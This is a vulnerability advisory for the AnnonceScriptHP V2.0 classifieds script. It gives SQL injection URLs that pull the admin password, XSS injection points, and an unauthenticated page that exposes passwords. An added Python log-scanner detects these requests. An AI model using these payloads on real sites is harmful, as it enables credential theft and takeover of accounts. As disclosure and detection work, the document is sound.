AnnonceScriptHP V2.0 Multiple Vulnerabilities

2006.12.12
Credit: Mr_KaLiMaN
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

AnnonceScriptHP V2.0
--------------------

Vendor site: http://www.scripthp.com/
Product: AnnonceScriptHP V2.0
Vulnerability: XSS & SQL Injection Vulnerability
Credits: Mr_KaLiMaN
Reported to Vendor: 02/12/06
Public disclosure: 09/12/06

Description:
------------

Password disclosure (all members):

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=1
(1 for admin etc...)

SQL Injection Vulnerability:

http://[victim]/[script_annonce_path]/email.php?id=[SQL INJECTION]
http://[victim]/[script_annonce_path]/email.php?id=-1 UNION SELECT null,passe,pseudo FROM an_membre WHERE idmembre=1#

http://[victim]/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION]
http://[victim]/[script_annonce_path]/voirannonce.php?no=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98#

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=[SQL INJECTION]
http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=-1 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM etc...#

http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.php?idannonce=[SQL INJECTION]
http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.php?idannonce=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null#

http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.php?idannonce=[SQL INJECTION]
http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.php?idannonce=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98#

XSS:

http://[victim]/[script_annonce_path]/erreurinscription.php?email=[XSS]
http://[victim]/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS]
http://[victim]/[script_annonce_path]/Templates/commun.dwt.php?email=[XSS]
http://[victim]/[script_annonce_path]/Templates/membre.dwt.php?email=[XSS]
http://[victim]/[script_annonce_path]/admin/admin_config/Aide.php?email=[XSS]
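
A log check for the scripts and parameters listed above, as an added example that is not part of the original advisory: it flags access-log requests where one of the listed id parameters is not a plain integer, or where `email` carries markup characters. It assumes combined-format access logs and that legitimate ids are plain integers; the `/annonces/` install path and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script -> parameter the advisory lists as SQL-injectable.
ID_PARAMS = {"email.php": "id", "voirannonce.php": "no",
             "fiche_membre.php": "idmembre", "okvalannonce.php": "idannonce",
             "changeannonce.php": "idannonce"}
# Scripts the advisory lists as reflecting the "email" parameter.
XSS_SCRIPTS = {"erreurinscription.php", "admin.dwt.php", "commun.dwt.php",
               "membre.dwt.php", "Aide.php"}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d+")       # assumption: a legitimate id is a plain integer
MARKUP_RE = re.compile(r'[<>"]')  # characters an e-mail address does not need

def classify(log_line):
    """Return 'sqli-suspect', 'xss-suspect' or None for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if script in ID_PARAMS:
        values = params.get(ID_PARAMS[script], [])
        if any(not INT_RE.fullmatch(v) for v in values):
            return "sqli-suspect"
    if script in XSS_SCRIPTS:
        if any(MARKUP_RE.search(v) for v in params.get("email", [])):
            return "xss-suspect"
    return None

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, verdict) for n, verdict in hits if verdict]

# Constructed sample: the "/annonces/" path and 192.0.2.x clients are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2006:10:00:01 +0100] "GET /annonces/voirannonce.php?no=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Dec/2006:10:00:07 +0100] "GET /annonces/email.php?id=-1%20UNION%20SELECT%20null,passe,pseudo%20FROM%20an_membre%20WHERE%20idmembre=1%23 HTTP/1.1" 200 812',
    '192.0.2.44 - - [10/Dec/2006:10:00:09 +0100] "GET /annonces/erreurinscription.php?email=%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 900',
    '192.0.2.10 - - [10/Dec/2006:10:00:15 +0100] "GET /annonces/erreurinscription.php?email=user@example.org HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

A request for fiche_membre.php?idmembre=1 carries a well-formed id, so the password disclosure listed first is not caught by this value check; that one calls for an access-control review of the admin/ paths.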

